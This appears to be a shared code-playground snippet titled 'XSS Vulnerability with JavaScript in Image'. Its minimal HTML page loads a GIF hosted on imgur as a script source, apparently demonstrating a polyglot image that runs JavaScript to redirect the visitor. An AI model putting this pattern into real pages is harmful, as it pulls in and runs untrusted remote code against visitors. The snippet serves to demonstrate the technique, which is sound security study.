BrowserCode
Forum
Options
Run
Undo
Redo
Erase
Save
Download
Beautify
Share
More
Close
New Tab
No Template
jQuery
HTML5
Bootstrap
Drop
Local Files
XSS Vulnerability with JavaScript in Image
HTML5 Security - Cross Domain Attack with JavaScript code in Image
security, xss, image, javascript
<!DOCTYPE html> <html> <head> <title>XSS vulnerability by using JS Code in Image</title> </head> <body> <h1>Redirect with JS in IMage</h1> <strong>Look at image source code</strong> <script src="http://i.imgur.com/7N60Ply.gif"></script> </body> </html>